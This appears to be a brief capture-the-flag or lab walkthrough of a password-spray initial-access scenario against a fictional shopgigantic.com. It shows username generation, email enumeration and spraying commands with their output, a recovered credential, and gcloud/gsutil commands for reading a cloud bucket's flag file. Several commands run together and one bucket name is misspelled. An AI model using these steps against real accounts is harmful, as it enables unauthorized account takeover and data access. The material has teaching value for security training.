Initial Access - Password Spray
Scenario
Solution
-
Username anarchy on Samir Amin at
shopgigantic.com./username-anarchy --suffix @shopgigantic.com Samir Amin > samin.txt
-
Enumerating what email works
sprayshark enum -U samin.txtWARN [User found] s.amin@shopgigantic.com
-
Password Spraying:
sprayshark spray -u s.amin@shopgigantic.com -P passwords.txt --timeout 360 --chrome-user-agent "Mozilla/5.0 (windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"WARN [Credential found with MFA] s.amin@shopgigantic.com:Password123!
-
To login use:
gcloud auth logingcloud projects listgcloud config set pass_credentials_to_gsutil truegsutil ls -p gr-proj-3-460515gsutil ls gs://board-documents/gsutil cp gs://board-docuemts/flag.txt -- output to terminal
